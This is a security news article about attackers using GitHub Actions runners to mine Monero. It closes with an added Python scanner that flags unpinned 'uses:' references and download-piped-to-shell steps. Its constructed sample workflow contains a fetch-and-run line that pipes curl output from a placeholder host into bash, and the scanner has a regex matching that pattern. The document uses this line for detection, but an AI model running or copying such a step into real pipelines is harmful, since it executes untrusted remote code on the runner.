Cybercriminals are abusing GitHub Actions (GHAs) and Azure virtual machines (VMs) for cloud-based cryptocurrency mining. According to a recent Trend Micro report, threat actors can leverage the runners, the servers GitHub provides to execute an organization's pipelines and automation, by making workflows download and install crypto miners on them.
GitHub Actions is a CI/CD platform that lets developers automate their software build, test, and deployment pipeline. It allows them to create workflows that build and test every pull request to a code repository, or deploy merged pull requests to production.
Trend Micro identified at least 1,000 repositories and over 550 code samples that abuse GHAs for cryptocurrency mining. Similar variants of a YAML workflow containing commands to mine Monero were found in 11 repositories, all of them paying out to the same wallet, which suggests that a single actor is behind the operation.
“For as long as the malicious actors only use their own accounts and repositories, end users should have no cause for worry. This is a problem GitHub is cognizant of and is trying to address and mitigate as much as possible. However, it is hard to eliminate the problem entirely. Problems arise when these GHAs are shared on GitHub Marketplace or used as a dependency for other Actions,” reads the report.
Anyone can create and share a GHA on GitHub Marketplace, so exercise caution and discernment when choosing a shared GHA from it. The researchers advise reviewing the “uses” directive in workflow YAML files: it names every external action a workflow pulls in, and each of those actions runs inside the job on the organization's runner.
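A practical way to act on that advice is to scan workflow files for the “uses” directive automatically. The script below is an added example, not code from the Trend Micro report or from GitHub: a dependency-free scanner that flags actions not pinned to a full commit SHA (a tag such as @v4 or a branch such as @main can be repointed later), container images not pinned by digest, and run steps that pipe a download straight into a shell, which is how a workflow would pull in a miner. The workflow text and the 40-character SHA in it are constructed for the example.

```python
"""Scan a GitHub Actions workflow for risky 'uses:' references and run steps.

Added example (not from the Trend Micro report or GitHub). It works on the raw
YAML text so that it needs no third-party parser.
"""
import re
from dataclasses import dataclass

# Constructed sample workflow; the SHA on the setup-node line is a placeholder.
SAMPLE_WORKFLOW = """\
name: build
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
      - uses: docker://alpine:3.19
      - uses: someuser/do-something@main
      - name: fetch tool
        run: curl -sSL https://example.invalid/install.sh | bash
      - name: build
        run: npm ci && npm test
"""

USES_RE = re.compile(r'^\s*(?:-\s+)?uses:\s*(\S+)')
# curl/wget output piped into sh, bash or zsh (optionally via sudo)
PIPE_TO_SHELL_RE = re.compile(r'\b(curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b')
FULL_SHA_RE = re.compile(r'[0-9a-f]{40}')


@dataclass
class Finding:
    line: int
    kind: str      # 'uses' or 'run'
    value: str
    reason: str


def classify_uses(ref):
    """Return None if the 'uses:' reference is acceptable, else a reason string."""
    ref = ref.strip('"\'')
    if ref.startswith('./'):
        return None  # local action checked into this repository
    if ref.startswith('docker://'):
        return None if '@sha256:' in ref else 'container image not pinned by digest'
    if '@' not in ref:
        return 'no ref given; resolves to the default branch'
    _, version = ref.rsplit('@', 1)
    if FULL_SHA_RE.fullmatch(version):
        return None  # immutable commit pin
    return f'mutable ref {version!r}; pin to a full commit SHA'


def scan_workflow(text):
    """Return a list of Findings for every risky line in the workflow text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith('#'):
            continue  # blank or commented-out line
        m = USES_RE.match(line)
        if m:
            reason = classify_uses(m.group(1))
            if reason:
                findings.append(Finding(n, 'uses', m.group(1), reason))
            continue
        if PIPE_TO_SHELL_RE.search(line):
            findings.append(Finding(n, 'run', stripped, 'remote script piped into a shell'))
    return findings


if __name__ == '__main__':
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f'line {f.line}: [{f.kind}] {f.value}: {f.reason}')
```

Run against the constructed workflow, the scanner reports the @v4 and @main references, the undigested alpine image, and the curl-to-bash step, while the SHA-pinned action and the local action pass. A pinned SHA is the only reference GitHub cannot silently re-resolve; the same check can be run over every file under .github/workflows as a pre-merge gate.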